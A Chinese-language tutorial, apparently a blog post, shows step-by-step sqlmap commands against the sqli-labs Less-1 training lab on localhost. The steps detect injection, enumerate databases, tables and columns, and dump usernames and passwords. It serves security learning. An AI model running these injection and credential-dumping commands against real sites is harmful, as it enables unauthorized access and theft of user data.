目录
一、Less1(GET-Error based – Single quotes -String)
(sqlmap)SQL注入基本步骤:
第一步:检测是否存在注入
第二步:爆数据库名
第三步:爆数据库表名
第四步:爆字段名
第五步:爆数据
扩展
命令扩展
(1)如果提前找到了数据库类型
–dbms +数据库
(2)扫描的等级
最高等级是
–leve=5 –risk=3
注:
我使用Windows中的sqlmap做,会带上python sqlmap.py
Linux:直接sqlmap +……
推荐:
一、Less1(GET-Error based – Single quotes -String)
1.1、第一步:检测是否存在注入
基础操作
python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ –batch
–batch是使用默认设置
其实环境都扫出来了
就可以再加上–dbms mysql了
1.2、第二步:爆数据库名
命令
#获取全部数据库
sqlmap.py -u url –dbs –batch
———
#获取当前数据库
sqlmap.py -u url –current-dbs –batch
基础操作
python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ –dbs –batch
1.3、第三步:爆数据库表名
命令
python sqlmap.py -u url -D DB –tables –batch
基础操作
python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security –tables –batch
1.4、第四步:爆字段名
命令:
sqlmap.py -u url -D DB -T TBL –columns –batch
基础操作
python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security -T users –columns –batch
1.5、第五步:爆数据
命令:
sqlmap.py -u url -D DB -T TBL -C “COL1,COL2” –dump –batch
基础操作:
python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security -T users -C “username,password” –dump –batch
注:
(1-4关基本类似,就以第一关为例)